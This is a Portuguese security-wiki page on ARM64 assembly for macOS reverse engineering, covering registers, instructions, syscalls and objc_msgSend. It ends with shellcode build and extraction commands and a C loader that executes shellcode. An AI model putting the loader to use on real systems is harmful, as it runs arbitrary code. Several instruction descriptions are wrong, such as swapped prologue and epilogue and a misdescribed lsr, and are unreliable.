hacktricks/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md
2024-12-12 13:56:11 +01:00

48 KiB

Introdução ao ARM64v8

{% hint style="success" %} Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)

Suporte ao HackTricks
{% endhint %}

Níveis de Exceção - EL (ARM64v8)

Na arquitetura ARMv8, os níveis de execução, conhecidos como Níveis de Exceção (ELs), definem o nível de privilégio e as capacidades do ambiente de execução. Existem quatro níveis de exceção, variando de EL0 a EL3, cada um servindo a um propósito diferente:

  1. EL0 - Modo de Usuário:
  • Este é o nível menos privilegiado e é usado para executar código de aplicativo regular.
  • Aplicativos executando em EL0 são isolados uns dos outros e do software do sistema, aumentando a segurança e a estabilidade.
  1. EL1 - Modo do Kernel do Sistema Operacional:
  • A maioria dos kernels de sistemas operacionais opera neste nível.
  • EL1 tem mais privilégios do que EL0 e pode acessar recursos do sistema, mas com algumas restrições para garantir a integridade do sistema.
  1. EL2 - Modo de Hypervisor:
  • Este nível é usado para virtualização. Um hypervisor executando em EL2 pode gerenciar múltiplos sistemas operacionais (cada um em seu próprio EL1) rodando no mesmo hardware físico.
  • EL2 fornece recursos para isolamento e controle dos ambientes virtualizados.
  1. EL3 - Modo de Monitor Seguro:
  • Este é o nível mais privilegiado e é frequentemente usado para inicialização segura e ambientes de execução confiáveis.
  • EL3 pode gerenciar e controlar acessos entre estados seguros e não seguros (como inicialização segura, OS confiável, etc.).

O uso desses níveis permite uma maneira estruturada e segura de gerenciar diferentes aspectos do sistema, desde aplicativos de usuário até o software do sistema mais privilegiado. A abordagem da ARMv8 em relação aos níveis de privilégio ajuda a isolar efetivamente diferentes componentes do sistema, aumentando assim a segurança e a robustez do sistema.

Registradores (ARM64v8)

ARM64 possui 31 registradores de uso geral, rotulados de x0 a x30. Cada um pode armazenar um valor 64 bits (8 bytes). Para operações que requerem apenas valores de 32 bits, os mesmos registradores podem ser acessados em um modo de 32 bits usando os nomes w0 a w30.

  1. x0 a x7 - Estes são tipicamente usados como registradores temporários e para passar parâmetros para sub-rotinas.
  • x0 também carrega os dados de retorno de uma função.
  1. x8 - No kernel do Linux, x8 é usado como o número da chamada de sistema para a instrução svc. No macOS, o x16 é o que é usado!
  2. x9 a x15 - Mais registradores temporários, frequentemente usados para variáveis locais.
  3. x16 e x17 - Registradores de Chamada Intra-procedural. Registradores temporários para valores imediatos. Eles também são usados para chamadas de função indiretas e stubs da PLT (Tabela de Ligação de Procedimentos).
  • x16 é usado como o número da chamada de sistema para a instrução svc no macOS.
  1. x18 - Registrador de Plataforma. Pode ser usado como um registrador de uso geral, mas em algumas plataformas, este registrador é reservado para usos específicos da plataforma: Ponteiro para o bloco de ambiente de thread local no Windows, ou para apontar para a estrutura de tarefa executando atualmente no kernel do linux.
  2. x19 a x28 - Estes são registradores salvos pelo chamado. Uma função deve preservar os valores desses registradores para seu chamador, então eles são armazenados na pilha e recuperados antes de voltar para o chamador.
  3. x29 - Ponteiro de Quadro para acompanhar o quadro da pilha. Quando um novo quadro de pilha é criado porque uma função é chamada, o registrador x29 é armazenado na pilha e o novo endereço do ponteiro de quadro é (endereço sp) armazenado neste registrador.
  • Este registrador também pode ser usado como um registrador de uso geral, embora geralmente seja usado como referência para variáveis locais.
  1. x30 ou lr - Registrador de Link. Ele mantém o endereço de retorno quando uma instrução BL (Branch with Link) ou BLR (Branch with Link to Register) é executada, armazenando o valor de pc neste registrador.
  • Ele também pode ser usado como qualquer outro registrador.
  • Se a função atual for chamar uma nova função e, portanto, sobrescrever lr, ela o armazenará na pilha no início, este é o epílogo (stp x29, x30 , [sp, #-48]; mov x29, sp -> Armazenar fp e lr, gerar espaço e obter novo fp) e recuperá-lo no final, este é o prólogo (ldp x29, x30, [sp], #48; ret -> Recuperar fp e lr e retornar).
  1. sp - Ponteiro de Pilha, usado para acompanhar o topo da pilha.
  • O valor de sp deve sempre ser mantido em pelo menos um alinhamento de quadword ou uma exceção de alinhamento pode ocorrer.
  1. pc - Contador de Programa, que aponta para a próxima instrução. Este registrador só pode ser atualizado através de gerações de exceção, retornos de exceção e branches. As únicas instruções ordinárias que podem ler este registrador são instruções de branch com link (BL, BLR) para armazenar o endereço de pc em lr (Registrador de Link).
  2. xzr - Registrador Zero. Também chamado de wzr em sua forma de registrador 32 bits. Pode ser usado para obter facilmente o valor zero (operação comum) ou para realizar comparações usando subs como subs XZR, Xn, #10 armazenando os dados resultantes em nenhum lugar (em xzr).

Os registradores Wn são a versão 32 bits do registrador Xn.

Registradores SIMD e de Ponto Flutuante

Além disso, existem outros 32 registradores de 128 bits que podem ser usados em operações otimizadas de múltiplos dados de instrução única (SIMD) e para realizar aritmética de ponto flutuante. Estes são chamados de registradores Vn, embora também possam operar em 64 bits, 32 bits, 16 bits e 8 bits e então são chamados de Qn, Dn, Sn, Hn e Bn.

Registradores do Sistema

Existem centenas de registradores do sistema, também chamados de registradores de propósito especial (SPRs), usados para monitorar e controlar o comportamento dos processadores.
Eles só podem ser lidos ou configurados usando as instruções especiais dedicadas mrs e msr.

Os registradores especiais TPIDR_EL0 e TPIDDR_EL0 são comumente encontrados ao realizar engenharia reversa. O sufixo EL0 indica a exceção mínima a partir da qual o registrador pode ser acessado (neste caso, EL0 é o nível de exceção regular (privilégio) com o qual programas regulares são executados).
Eles são frequentemente usados para armazenar o endereço base da região de armazenamento local de thread na memória. Geralmente, o primeiro é legível e gravável para programas executando em EL0, mas o segundo pode ser lido de EL0 e escrito de EL1 (como o kernel).

  • mrs x0, TPIDR_EL0 ; Ler TPIDR_EL0 em x0
  • msr TPIDR_EL0, X0 ; Escrever x0 em TPIDR_EL0

PSTATE

PSTATE contém vários componentes do processo serializados no registrador especial visível pelo sistema operacional SPSR_ELx, sendo X o nível de permissão da exceção acionada (isso permite recuperar o estado do processo quando a exceção termina).
Estes são os campos acessíveis:

  • As flags de condição N, Z, C e V:
  • N significa que a operação resultou em um resultado negativo.
  • Z significa que a operação resultou em zero.
  • C significa que a operação teve carry.
  • V significa que a operação resultou em um overflow assinado:
  • A soma de dois números positivos resulta em um número negativo.
  • A soma de dois números negativos resulta em um número positivo.
  • Na subtração, quando um número negativo grande é subtraído de um número positivo menor (ou vice-versa), e o resultado não pode ser representado dentro do intervalo do tamanho de bits dado.
  • Obviamente, o processador não sabe se a operação é assinada ou não, então ele verificará C e V nas operações e indicará se ocorreu um carry no caso de ser assinado ou não assinado.

{% hint style="warning" %} Nem todas as instruções atualizam essas flags. Algumas como CMP ou TST fazem isso, e outras que têm um sufixo s como ADDS também o fazem. {% endhint %}

  • A flag de largura de registrador atual (nRW): Se a flag tiver o valor 0, o programa será executado no estado de execução AArch64 uma vez retomado.
  • O Nível de Exceção atual (EL): Um programa regular executando em EL0 terá o valor 0.
  • A flag de passo único (SS): Usada por depuradores para executar um passo único definindo a flag SS para 1 dentro de SPSR_ELx através de uma exceção. O programa executará um passo e emitirá uma exceção de passo único.
  • A flag de estado de exceção ilegal (IL): É usada para marcar quando um software privilegiado realiza uma transferência de nível de exceção inválida, essa flag é definida como 1 e o processador aciona uma exceção de estado ilegal.
  • As flags DAIF: Essas flags permitem que um programa privilegiado oculte seletivamente certas exceções externas.
  • Se A for 1, significa que aborts assíncronos serão acionados. O I configura para responder a Solicitações de Interrupção de Hardware (IRQs). e o F está relacionado a Solicitações de Interrupção Rápida (FIRs).
  • As flags de seleção de ponteiro de pilha (SPS): Programas privilegiados executando em EL1 e acima podem alternar entre usar seu próprio registrador de ponteiro de pilha e o de modelo de usuário (por exemplo, entre SP_EL1 e EL0). Essa troca é realizada escrevendo no registrador especial SPSel. Isso não pode ser feito a partir de EL0.

Convenção de Chamada (ARM64v8)

A convenção de chamada ARM64 especifica que os primeiros oito parâmetros para uma função são passados em registradores x0 a x7. Parâmetros adicionais são passados na pilha. O valor de retorno é passado de volta no registrador x0, ou em x1 também se for longo de 128 bits. Os registradores x19 a x30 e sp devem ser preservados entre chamadas de função.

Ao ler uma função em assembly, procure o prólogo e epílogo da função. O prólogo geralmente envolve salvar o ponteiro de quadro (x29), configurar um novo ponteiro de quadro, e alocar espaço na pilha. O epílogo geralmente envolve restaurar o ponteiro de quadro salvo e retornar da função.

Convenção de Chamada em Swift

Swift tem sua própria convenção de chamada que pode ser encontrada em https://github.com/apple/swift/blob/main/docs/ABI/CallConvSummary.rst#arm64

Instruções Comuns (ARM64v8)

As instruções ARM64 geralmente têm o formato opcode dst, src1, src2, onde opcode é a operação a ser realizada (como add, sub, mov, etc.), dst é o registrador de destino onde o resultado será armazenado, e src1 e src2 são os registradores de origem. Valores imediatos também podem ser usados no lugar de registradores de origem.

  • mov: Mover um valor de um registrador para outro.
  • Exemplo: mov x0, x1 — Isso move o valor de x1 para x0.
  • ldr: Carregar um valor da memória para um registrador.
  • Exemplo: ldr x0, [x1] — Isso carrega um valor da localização de memória apontada por x1 para x0.
  • Modo de deslocamento: Um deslocamento que afeta o ponteiro de origem é indicado, por exemplo:
  • ldr x2, [x1, #8], isso carregará em x2 o valor de x1 + 8.
  • ldr x2, [x0, x1, lsl #2], isso carregará em x2 um objeto do array x0, da posição x1 (índice) * 4.
  • Modo pré-indexado: Isso aplicará cálculos à origem, obterá o resultado e também armazenará a nova origem na origem.
  • ldr x2, [x1, #8]!, isso carregará x1 + 8 em x2 e armazenará em x1 o resultado de x1 + 8.
  • str lr, [sp, #-4]!, Armazena o registrador de link em sp e atualiza o registrador sp.
  • Modo pós-indexado: Isso é como o anterior, mas o endereço de memória é acessado e então o deslocamento é calculado e armazenado.
  • ldr x0, [x1], #8, carrega x1 em x0 e atualiza x1 com x1 + 8.
  • Endereçamento relativo ao PC: Neste caso, o endereço a ser carregado é calculado em relação ao registrador PC.
  • ldr x1, =_start, Isso carregará o endereço onde o símbolo _start começa em x1 relacionado ao PC atual.
  • str: Armazenar um valor de um registrador na memória.
  • Exemplo: str x0, [x1] — Isso armazena o valor em x0 na localização de memória apontada por x1.
  • ldp: Carregar Par de Registradores. Esta instrução carrega dois registradores de localizações de memória consecutivas. O endereço de memória é tipicamente formado adicionando um deslocamento ao valor em outro registrador.
  • Exemplo: ldp x0, x1, [x2] — Isso carrega x0 e x1 das localizações de memória em x2 e x2 + 8, respectivamente.
  • stp: Armazenar Par de Registradores. Esta instrução armazena dois registradores em localizações de memória consecutivas. O endereço de memória é tipicamente formado adicionando um deslocamento ao valor em outro registrador.
  • Exemplo: stp x0, x1, [sp] — Isso armazena x0 e x1 nas localizações de memória em sp e sp + 8, respectivamente.
  • stp x0, x1, [sp, #16]! — Isso armazena x0 e x1 nas localizações de memória em sp+16 e sp + 24, respectivamente, e atualiza sp com sp+16.
  • add: Adicionar os valores de dois registradores e armazenar o resultado em um registrador.
  • Sintaxe: add(s) Xn1, Xn2, Xn3 | #imm, [shift #N | RRX]
  • Xn1 -> Destino
  • Xn2 -> Operando 1
  • Xn3 | #imm -> Operando 2 (registrador ou imediato)
  • [shift #N | RRX] -> Realizar um deslocamento ou chamar RRX.
  • Exemplo: add x0, x1, x2 — Isso adiciona os valores em x1 e x2 e armazena o resultado em x0.
  • add x5, x5, #1, lsl #12 — Isso é igual a 4096 (um 1 deslocado 12 vezes) -> 1 0000 0000 0000 0000.
  • adds Isso realiza um add e atualiza as flags.
  • sub: Subtrair os valores de dois registradores e armazenar o resultado em um registrador.
  • Verifique a sintaxe de add.
  • Exemplo: sub x0, x1, x2 — Isso subtrai o valor em x2 de x1 e armazena o resultado em x0.
  • subs Isso é como sub, mas atualiza a flag.
  • mul: Multiplicar os valores de dois registradores e armazenar o resultado em um registrador.
  • Exemplo: mul x0, x1, x2 — Isso multiplica os valores em x1 e x2 e armazena o resultado em x0.
  • div: Dividir o valor de um registrador por outro e armazenar o resultado em um registrador.
  • Exemplo: div x0, x1, x2 — Isso divide o valor em x1 por x2 e armazena o resultado em x0.
  • lsl, lsr, asr, ror, rrx:
  • Deslocamento lógico à esquerda: Adiciona 0s do final movendo os outros bits para frente (multiplica por n vezes 2).
  • Deslocamento lógico à direita: Adiciona 1s no início movendo os outros bits para trás (divide por n vezes 2 em não assinado).
  • Deslocamento aritmético à direita: Como lsr, mas em vez de adicionar 0s, se o bit mais significativo for 1, 1s são adicionados (divide por n vezes 2 em assinado).
  • Rotacionar à direita: Como lsr, mas o que for removido da direita é anexado à esquerda.
  • Rotacionar à direita com extensão: Como ror, mas com a flag de carry como o "bit mais significativo". Assim, a flag de carry é movida para o bit 31 e o bit removido para a flag de carry.
  • bfm: Movimento de Campo de Bits, essas operações copiam bits 0...n de um valor e os colocam em posições m..m+n. O #s especifica a posição do bit mais à esquerda e #r a quantidade de rotação à direita.
  • Movimento de campo de bits: BFM Xd, Xn, #r.
  • Movimento de campo de bits assinado: SBFM Xd, Xn, #r, #s.
  • Movimento de campo de bits não assinado: UBFM Xd, Xn, #r, #s.
  • Extração e Inserção de Campo de Bits: Copia um campo de bits de um registrador e o copia para outro registrador.
  • BFI X1, X2, #3, #4 Insere 4 bits de X2 a partir do 3º bit de X1.
  • BFXIL X1, X2, #3, #4 Extrai do 3º bit de X2 quatro bits e os copia para X1.
  • SBFIZ X1, X2, #3, #4 Estende o sinal de 4 bits de X2 e os insere em X1 começando na posição do bit 3 zerando os bits à direita.
  • SBFX X1, X2, #3, #4 Extrai 4 bits começando no bit 3 de X2, estende o sinal e coloca o resultado em X1.
  • UBFIZ X1, X2, #3, #4 Estende 4 bits de X2 e os insere em X1 começando na posição do bit 3 zerando os bits à direita.
  • UBFX X1, X2, #3, #4 Extrai 4 bits começando no bit 3 de X2 e coloca o resultado estendido a zero em X1.
  • Extensão de Sinal para X: Estende o sinal (ou adiciona apenas 0s na versão não assinada) de um valor para poder realizar operações com ele:
  • SXTB X1, W2 Estende o sinal de um byte de W2 para X1 (W2 é metade de X2) para preencher os 64 bits.
  • SXTH X1, W2 Estende o sinal de um número de 16 bits de W2 para X1 para preencher os 64 bits.
  • SXTW X1, W2 Estende o sinal de um byte de W2 para X1 para preencher os 64 bits.
  • UXTB X1, W2 Adiciona 0s (não assinado) a um byte de W2 para X1 para preencher os 64 bits.
  • extr: Extrai bits de um par de registradores especificados concatenados.
  • Exemplo: EXTR W3, W2, W1, #3 Isso irá concatenar W1+W2 e obter do bit 3 de W2 até o bit 3 de W1 e armazená-lo em W3.
  • cmp: Comparar dois registradores e definir flags de condição. É um alias de subs definindo o registrador de destino como o registrador zero. Útil para saber se m == n.
  • Suporta a mesma sintaxe que subs.
  • Exemplo: cmp x0, x1 — Isso compara os valores em x0 e x1 e define as flags de condição de acordo.
  • cmn: Comparar o operando negativo. Neste caso, é um alias de adds e suporta a mesma sintaxe. Útil para saber se m == -n.
  • ccmp: Comparação condicional, é uma comparação que será realizada apenas se uma comparação anterior foi verdadeira e definirá especificamente os bits nzcv.
  • cmp x1, x2; ccmp x3, x4, 0, NE; blt _func -> se x1 != x2 e x3 < x4, salte para func.
  • Isso ocorre porque ccmp só será executado se a comparação anterior cmp foi um NE, se não foi, os bits nzcv serão definidos como 0 (o que não satisfará a comparação blt).
  • Isso também pode ser usado como ccmn (o mesmo, mas negativo, como cmp vs cmn).
  • tst: Verifica se algum dos valores da comparação é 1 (funciona como um ANDS sem armazenar o resultado em nenhum lugar). É útil para verificar um registrador com um valor e verificar se algum dos bits do registrador indicado no valor é 1.
  • Exemplo: tst X1, #7 Verifica se algum dos últimos 3 bits de X1 é 1.
  • teq: Operação XOR descartando o resultado.
  • b: Branch incondicional.
  • Exemplo: b myFunction.
  • Note que isso não preencherá o registrador de link com o endereço de retorno (não é adequado para chamadas de sub-rotina que precisam retornar).
  • bl: Branch com link, usado para chamar uma sub-rotina. Armazena o endereço de retorno em x30.
  • Exemplo: bl myFunction — Isso chama a função myFunction e armazena o endereço de retorno em x30.
  • Note que isso não preencherá o registrador de link com o endereço de retorno (não é adequado para chamadas de sub-rotina que precisam retornar).
  • blr: Branch com Link para Registrador, usado para chamar uma sub-rotina onde o alvo é especificado em um registrador. Armazena o endereço de retorno em x30. (Isso é
  • Exemplo: blr x1 — Isso chama a função cujo endereço está contido em x1 e armazena o endereço de retorno em x30.
  • ret: Retornar da sub-rotina, normalmente usando o endereço em x30.
  • Exemplo: ret — Isso retorna da sub-rotina atual usando o endereço de retorno em x30.
  • b.<cond>: Branches condicionais.
  • b.eq: Branch se igual, com base na instrução cmp anterior.
  • Exemplo: b.eq label — Se a instrução cmp anterior encontrou dois valores iguais, isso salta para label.
  • b.ne: Branch se Não Igual. Esta instrução verifica as flags de condição (que foram definidas por uma instrução de comparação anterior), e se os valores comparados não forem iguais, ela faz um branch para um rótulo ou endereço.
  • Exemplo: Após uma instrução cmp x0, x1, b.ne label — Se os valores em x0 e x1 não forem iguais, isso salta para label.
  • cbz: Comparar e Branch em Zero. Esta instrução compara um registrador com zero, e se forem iguais, faz um branch para um rótulo ou endereço.
  • Exemplo: cbz x0, label — Se o valor em x0 for zero, isso salta para label.
  • cbnz: Comparar e Branch em Não Zero. Esta instrução compara um registrador com zero, e se não forem iguais, faz um branch para um rótulo ou endereço.
  • Exemplo: cbnz x0, label — Se o valor em x0 for não zero, isso salta para label.
  • tbnz: Testa o bit e faz branch em não zero.
  • Exemplo: tbnz x0, #8, label.
  • tbz: Testa o bit e faz branch em zero.
  • Exemplo: tbz x0, #8, label.
  • Operações de seleção condicional: Estas são operações cujo comportamento varia dependendo dos bits condicionais.
  • csel Xd, Xn, Xm, cond -> csel X0, X1, X2, EQ -> Se verdadeiro, X0 = X1, se falso, X0 = X2.
  • csinc Xd, Xn, Xm, cond -> Se verdadeiro, Xd = Xn, se falso, Xd = Xm + 1.
  • cinc Xd, Xn, cond -> Se verdadeiro, Xd = Xn + 1, se falso, Xd = Xn.
  • csinv Xd, Xn, Xm, cond -> Se verdadeiro, Xd = Xn, se falso, Xd = NOT(Xm).
  • cinv Xd, Xn, cond -> Se verdadeiro, Xd = NOT(Xn), se falso, Xd = Xn.
  • csneg Xd, Xn, Xm, cond -> Se verdadeiro, Xd = Xn, se falso, Xd = - Xm.
  • cneg Xd, Xn, cond -> Se verdadeiro, Xd = - Xn, se falso, Xd = Xn.
  • cset Xd, Xn, Xm, cond -> Se verdadeiro, Xd = 1, se falso, Xd = 0.
  • csetm Xd, Xn, Xm, cond -> Se verdadeiro, Xd = <todos 1>, se falso, Xd = 0.
  • adrp: Calcula o endereço da página de um símbolo e o armazena em um registrador.
  • Exemplo: adrp x0, symbol — Isso calcula o endereço da página de symbol e o armazena em x0.
  • ldrsw: Carregar um valor 32 bits assinado da memória e estendê-lo para 64 bits.
  • Exemplo: ldrsw x0, [x1] — Isso carrega um valor assinado de 32 bits da localização de memória apontada por x1, estende-o para 64 bits e o armazena em x0.
  • stur: Armazenar um valor de registrador em uma localização de memória, usando um deslocamento de outro registrador.
  • Exemplo: stur x0, [x1, #4] — Isso armazena o valor em x0 na localização de memória que é 4 bytes maior do que o endereço atualmente em x1.
  • svc : Faz uma chamada de sistema. Significa "Supervisor Call". Quando o processador executa esta instrução, ele muda do modo de usuário para o modo de kernel e salta para um local específico na memória onde o código de manipulação de chamadas de sistema do kernel está localizado.
  • Exemplo:
mov x8, 93  ; Carrega o número da chamada de sistema para sair (93) no registrador x8.
mov x0, 0   ; Carrega o código de status de saída (0) no registrador x0.
svc 0       ; Faz a chamada de sistema.

Prólogo da Função

  1. Salvar o registrador de link e o ponteiro de quadro na pilha:
stp x29, x30, [sp, #-16]!  ; store pair x29 and x30 to the stack and decrement the stack pointer

{% endcode %}

  1. Configurar o novo ponteiro de quadro: mov x29, sp (configura o novo ponteiro de quadro para a função atual)
  2. Alocar espaço na pilha para variáveis locais (se necessário): sub sp, sp, <size> (onde <size> é o número de bytes necessários)

Epilogo da Função

  1. Desalocar variáveis locais (se alguma foi alocada): add sp, sp, <size>
  2. Restaurar o registrador de link e o ponteiro de quadro:

{% code overflow="wrap" %}

ldp x29, x30, [sp], #16  ; load pair x29 and x30 from the stack and increment the stack pointer

{% endcode %}

  1. Retorno: ret (retorna o controle para o chamador usando o endereço no registrador de link)

Estado de Execução AARCH32

Armv8-A suporta a execução de programas de 32 bits. AArch32 pode operar em um dos dois conjuntos de instruções: A32 e T32 e pode alternar entre eles via interworking.
Programas privilegiados de 64 bits podem agendar a execução de programas de 32 bits executando uma transferência de nível de exceção para o nível de privilégio inferior de 32 bits.
Note que a transição de 64 bits para 32 bits ocorre com uma redução do nível de exceção (por exemplo, um programa de 64 bits em EL1 acionando um programa em EL0). Isso é feito configurando o bit 4 de SPSR_ELx registro especial para 1 quando o thread do processo AArch32 está pronto para ser executado e o restante de SPSR_ELx armazena o AArch32 CPSR. Em seguida, o processo privilegiado chama a instrução ERET para que o processador transite para AArch32 entrando em A32 ou T32 dependendo do CPSR**.**

O interworking ocorre usando os bits J e T do CPSR. J=0 e T=0 significa A32 e J=0 e T=1 significa T32. Isso basicamente se traduz em definir o bit mais baixo como 1 para indicar que o conjunto de instruções é T32.
Isso é configurado durante as instruções de ramificação interworking, mas também pode ser configurado diretamente com outras instruções quando o PC é definido como o registrador de destino. Exemplo:

Outro exemplo:

_start:
.code 32                ; Begin using A32
add r4, pc, #1      ; Here PC is already pointing to "mov r0, #0"
bx r4               ; Swap to T32 mode: Jump to "mov r0, #0" + 1 (so T32)

.code 16:
mov r0, #0
mov r0, #8

Registradores

Existem 16 registradores de 32 bits (r0-r15). De r0 a r14 eles podem ser usados para qualquer operação, no entanto, alguns deles geralmente são reservados:

  • r15: Contador de programa (sempre). Contém o endereço da próxima instrução. Em A32 atual + 8, em T32, atual + 4.
  • r11: Ponteiro de quadro
  • r12: Registrador de chamada intra-processual
  • r13: Ponteiro de pilha
  • r14: Registrador de link

Além disso, os registradores são salvos em registros bancados. Que são lugares que armazenam os valores dos registradores permitindo realizar trocas de contexto rápidas no tratamento de exceções e operações privilegiadas para evitar a necessidade de salvar e restaurar registradores manualmente toda vez.
Isso é feito salvando o estado do processador do CPSR para o SPSR do modo do processador ao qual a exceção é gerada. Ao retornar da exceção, o CPSR é restaurado do SPSR.

CPSR - Registro de Status do Programa Atual

Em AArch32, o CPSR funciona de forma semelhante ao PSTATE em AArch64 e também é armazenado em SPSR_ELx quando uma exceção é gerada para restaurar a execução posteriormente:

Os campos são divididos em alguns grupos:

  • Registro de Status do Programa de Aplicação (APSR): Flags aritméticas e acessíveis a partir do EL0
  • Registradores de Estado de Execução: Comportamento do processo (gerenciado pelo SO).

Registro de Status do Programa de Aplicação (APSR)

  • As flags N, Z, C, V (assim como em AArch64)
  • A flag Q: É definida como 1 sempre que ocorre saturação inteira durante a execução de uma instrução aritmética de saturação especializada. Uma vez definida como 1, manterá o valor até que seja manualmente definida como 0. Além disso, não há nenhuma instrução que verifique seu valor implicitamente, deve ser feito lendo-o manualmente.
  • Flags GE (Maior ou igual): É usada em operações SIMD (Instrução Única, Múltiplos Dados), como "adição paralela" e "subtração paralela". Essas operações permitem processar múltiplos pontos de dados em uma única instrução.

Por exemplo, a instrução UADD8 adiciona quatro pares de bytes (de dois operandos de 32 bits) em paralelo e armazena os resultados em um registrador de 32 bits. Em seguida, define as flags GE no APSR com base nesses resultados. Cada flag GE corresponde a uma das adições de bytes, indicando se a adição para aquele par de bytes transbordou.

A instrução SEL usa essas flags GE para realizar ações condicionais.

Registradores de Estado de Execução

  • Os bits J e T: J deve ser 0 e se T for 0, o conjunto de instruções A32 é usado, e se for 1, o T32 é usado.
  • Registro de Estado do Bloco IT (ITSTATE): Esses são os bits de 10-15 e 25-26. Eles armazenam condições para instruções dentro de um grupo prefixado por IT.
  • Bit E: Indica a endianness.
  • Bits de Modo e Máscara de Exceção (0-4): Eles determinam o estado de execução atual. O indica se o programa está sendo executado como 32 bits (um 1) ou 64 bits (um 0). Os outros 4 representam o modo de exceção atualmente em uso (quando uma exceção ocorre e está sendo tratada). O número definido indica a prioridade atual caso outra exceção seja acionada enquanto esta está sendo tratada.
  • AIF: Certas exceções podem ser desativadas usando os bits A, I, F. Se A for 1, significa que aborts assíncronos serão acionados. O I configura para responder a Solicitações de Interrupção de hardware externo (IRQs). e o F está relacionado a Solicitações de Interrupção Rápida (FIRs).

macOS

Chamadas de sistema BSD

Confira syscalls.master. As chamadas de sistema BSD terão x16 > 0.

Armadilhas Mach

Confira em syscall_sw.c a mach_trap_table e em mach_traps.h os protótipos. O número máximo de armadilhas Mach é MACH_TRAP_TABLE_COUNT = 128. As armadilhas Mach terão x16 < 0, então você precisa chamar os números da lista anterior com um menos: _kernelrpc_mach_vm_allocate_trap é -10.

Você também pode verificar libsystem_kernel.dylib em um desassemblador para encontrar como chamar essas (e BSD) chamadas de sistema:

{% code overflow="wrap" %}

# macOS
dyldex -e libsystem_kernel.dylib /System/Volumes/Preboot/Cryptexes/OS/System/Library/dyld/dyld_shared_cache_arm64e

# iOS
dyldex -e libsystem_kernel.dylib /System/Library/Caches/com.apple.dyld/dyld_shared_cache_arm64

{% endcode %}

Note que Ida e Ghidra também podem descompilar dylibs específicas do cache apenas passando pelo cache.

{% hint style="success" %} Às vezes, é mais fácil verificar o código descompilado de libsystem_kernel.dylib do que verificar o código-fonte porque o código de várias syscalls (BSD e Mach) é gerado via scripts (ver comentários no código-fonte), enquanto na dylib você pode encontrar o que está sendo chamado. {% endhint %}

chamadas machdep

XNU suporta outro tipo de chamadas chamadas dependentes de máquina. Os números dessas chamadas dependem da arquitetura e nem as chamadas nem os números são garantidos para permanecer constantes.

página de comunicação

Esta é uma página de memória de propriedade do kernel que está mapeada no espaço de endereços de cada processo de usuário. É destinada a tornar a transição do modo usuário para o espaço do kernel mais rápida do que usar syscalls para serviços do kernel que são usados tanto que essa transição seria muito ineficiente.

Por exemplo, a chamada gettimeofdate lê o valor de timeval diretamente da página de comunicação.

objc_msgSend

É super comum encontrar esta função usada em programas Objective-C ou Swift. Esta função permite chamar um método de um objeto Objective-C.

Parâmetros (mais informações na documentação):

  • x0: self -> Ponteiro para a instância
  • x1: op -> Seletor do método
  • x2... -> Restante dos argumentos do método invocado

Então, se você colocar um breakpoint antes do ramo para esta função, pode facilmente encontrar o que está sendo invocado no lldb com (neste exemplo, o objeto chama um objeto de NSConcreteTask que irá executar um comando):

# Right in the line were objc_msgSend will be called
(lldb) po $x0
<NSConcreteTask: 0x1052308e0>

(lldb) x/s $x1
0x1736d3a6e: "launch"

(lldb) po [$x0 launchPath]
/bin/sh

(lldb) po [$x0 arguments]
<__NSArrayI 0x1736801e0>(
-c,
whoami
)

{% hint style="success" %} Definindo a variável de ambiente NSObjCMessageLoggingEnabled=1 é possível registrar quando essa função é chamada em um arquivo como /tmp/msgSends-pid.

Além disso, definindo OBJC_HELP=1 e chamando qualquer binário, você pode ver outras variáveis de ambiente que poderia usar para logar quando certas ações Objc-C ocorrem. {% endhint %}

Quando essa função é chamada, é necessário encontrar o método chamado da instância indicada, para isso, diferentes buscas são feitas:

  • Realizar busca otimista no cache:
  • Se bem-sucedido, feito
  • Adquirir runtimeLock (leitura)
  • Se (realizar && !cls->realized) realizar classe
  • Se (inicializar && !cls->initialized) inicializar classe
  • Tentar cache próprio da classe:
  • Se bem-sucedido, feito
  • Tentar lista de métodos da classe:
  • Se encontrado, preencher cache e feito
  • Tentar cache da superclasse:
  • Se bem-sucedido, feito
  • Tentar lista de métodos da superclasse:
  • Se encontrado, preencher cache e feito
  • Se (resolver) tentar resolvedor de método e repetir a busca da classe
  • Se ainda aqui (= tudo o mais falhou) tentar encaminhador

Shellcodes

Para compilar:

as -o shell.o shell.s
ld -o shell shell.o -macosx_version_min 13.0 -lSystem -L /Library/Developer/CommandLineTools/SDKs/MacOSX.sdk/usr/lib

# You could also use this
ld -o shell shell.o -syslibroot $(xcrun -sdk macosx --show-sdk-path) -lSystem

Para extrair os bytes:

# Code from https://github.com/daem0nc0re/macOS_ARM64_Shellcode/blob/b729f716aaf24cbc8109e0d94681ccb84c0b0c9e/helper/extract.sh
for c in $(objdump -d "s.o" | grep -E '[0-9a-f]+:' | cut -f 1 | cut -d : -f 2) ; do
echo -n '\\x'$c
done

Para versões mais recentes do macOS:

# Code from https://github.com/daem0nc0re/macOS_ARM64_Shellcode/blob/fc0742e9ebaf67c6a50f4c38d59459596e0a6c5d/helper/extract.sh
for s in $(objdump -d "s.o" | grep -E '[0-9a-f]+:' | cut -f 1 | cut -d : -f 2) ; do
echo -n $s | awk '{for (i = 7; i > 0; i -= 2) {printf "\\x" substr($0, i, 2)}}'
done
C código para testar o shellcode ```c // code from https://github.com/daem0nc0re/macOS_ARM64_Shellcode/blob/master/helper/loader.c // gcc loader.c -o loader #include #include <sys/mman.h> #include #include

int (*sc)();

char shellcode[] = "";

int main(int argc, char **argv) { printf("[>] Shellcode Length: %zd Bytes\n", strlen(shellcode));

void *ptr = mmap(0, 0x1000, PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE | MAP_JIT, -1, 0);

if (ptr == MAP_FAILED) { perror("mmap"); exit(-1); } printf("[+] SUCCESS: mmap\n"); printf(" |-> Return = %p\n", ptr);

void *dst = memcpy(ptr, shellcode, sizeof(shellcode)); printf("[+] SUCCESS: memcpy\n"); printf(" |-> Return = %p\n", dst);

int status = mprotect(ptr, 0x1000, PROT_EXEC | PROT_READ);

if (status == -1) { perror("mprotect"); exit(-1); } printf("[+] SUCCESS: mprotect\n"); printf(" |-> Return = %d\n", status);

printf("[>] Trying to execute shellcode...\n");

sc = ptr; sc();

return 0; }

</details>

#### Shell

Retirado de [**aqui**](https://github.com/daem0nc0re/macOS\_ARM64\_Shellcode/blob/master/shell.s) e explicado.

{% tabs %}
